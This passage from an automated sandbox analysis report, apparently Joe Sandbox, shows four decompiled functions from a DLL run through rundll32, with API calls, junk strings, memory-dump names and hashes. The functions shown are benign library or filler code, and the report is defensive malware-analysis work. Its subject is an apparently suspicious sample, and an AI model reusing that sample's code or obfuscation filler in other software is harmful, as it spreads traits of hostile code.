                                                                                                            • Opcode Fuzzy Hash: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
                                                                                                            • Instruction Fuzzy Hash: CED0C9753887017AFA09D741DE97FC6B750E795B06F019008F749EE5D1CBB890408F15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10001E20(void* _a4, intOrPtr _a8) {
				signed int _t3;

				_t3 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				asm("sbb eax, eax");
				return _t3 *  *0x100440cc + _a8 + 1;
			}




                                                                                                            0x10001e38
                                                                                                            0x10001e4d
                                                                                                            0x10001e50

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001E38
                                                                                                            Strings
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E2C
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001E25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
                                                                                                            • Instruction ID: 3fdeccdcda24fa04b64c34d0073cfd5bdbdd3e77499752cdea2f7536024f9e24
                                                                                                            • Opcode Fuzzy Hash: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
                                                                                                            • Instruction Fuzzy Hash: 2DD0C931298311BAE2059B60CD86F86B794E756B07F01C514F345EE4D1C7B090848A25
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003854 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003854(void* __ecx) {

				E1000EE6D(__ecx, 0x3e9, "Mundo Hola");
				return SendMessageA( *(__ecx + 0xe8), 0x143, 0, "Hola Mundo");
			}



                                                                                                            0x10003861
                                                                                                            0x1000387f

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EE6D: SetDlgItemTextA.USER32 ref: 1000EE7E
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,Hola Mundo), ref: 10003878
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSendText
                                                                                                            • String ID: Hola Mundo$Mundo Hola
                                                                                                            • API String ID: 77679052-617527613
                                                                                                            • Opcode ID: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
                                                                                                            • Instruction ID: 1811b1191abaef19ada81be914ca39904a3dc6a32a47f6b2494c466348ef455e
                                                                                                            • Opcode Fuzzy Hash: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
                                                                                                            • Instruction Fuzzy Hash: D2C080301403A07FF5226250FC06FCA5910CB05753F008501730D7D0D18B5139804640
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011382 Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10011382(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E10004E6E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10048670 == 0) {
					_t4 = E1001135E();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10048828 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10048810);
					if( *_t15 == 0) {
						_t4 = 0x10048678 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10048810);
				}
				EnterCriticalSection(0x10048678 + _t11 * 0x18);
				return _t4;
			}











                                                                                                            0x10011382
                                                                                                            0x10011382
                                                                                                            0x10011382
                                                                                                            0x10011383
                                                                                                            0x10011387
                                                                                                            0x1001138a
                                                                                                            0x1001138c
                                                                                                            0x1001138c
                                                                                                            0x10011398
                                                                                                            0x1001139a
                                                                                                            0x1001139a
                                                                                                            0x1001139f
                                                                                                            0x100113a6
                                                                                                            0x100113a7
                                                                                                            0x100113a8
                                                                                                            0x100113b7
                                                                                                            0x100113be
                                                                                                            0x100113c3
                                                                                                            0x100113ca
                                                                                                            0x100113cd
                                                                                                            0x100113d3
                                                                                                            0x100113d3
                                                                                                            0x100113da
                                                                                                            0x100113da
                                                                                                            0x100113e6
                                                                                                            0x100113ec

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
                                                                                                            • InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
                                                                                                            • LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
                                                                                                            • EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2895727460-0
                                                                                                            • Opcode ID: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
                                                                                                            • Instruction ID: 2a1b714fc97c26e45b6e87192a60087c5aec0faa5666cee140badcbafd2b3ba5
                                                                                                            • Opcode Fuzzy Hash: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
                                                                                                            • Instruction Fuzzy Hash: BFF0F6735001288FD6409F54CC8475DB7AAFB82395F56482AE1508A056CF31D681C769
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100105F0 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100105F0(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10048600
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                                                                                                            0x100105f2
                                                                                                            0x100105f5
                                                                                                            0x100105f5
                                                                                                            0x100105f9
                                                                                                            0x100105ff
                                                                                                            0x10010605
                                                                                                            0x1001062e
                                                                                                            0x1001062f
                                                                                                            0x00000000
                                                                                                            0x10010635
                                                                                                            0x10010607
                                                                                                            0x1001060a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001060e
                                                                                                            0x10010616
                                                                                                            0x00000000
                                                                                                            0x1001061d
                                                                                                            0x10010624
                                                                                                            0x00000000
                                                                                                            0x1001062a

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 100105F9
                                                                                                            • TlsGetValue.KERNEL32(100485E4,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001060E
                                                                                                            • LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 10010624
                                                                                                            • LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001062F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3969253408-0
                                                                                                            • Opcode ID: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
                                                                                                            • Instruction ID: 62d6a443bb2e53cdd0c433372c742529333c02fcab520335ef35924ea7a93314
                                                                                                            • Opcode Fuzzy Hash: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
                                                                                                            • Instruction Fuzzy Hash: C2F0127A3005109FD321CF64CC8884A73E9FFC839171A8866F8819B123DB71F895CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%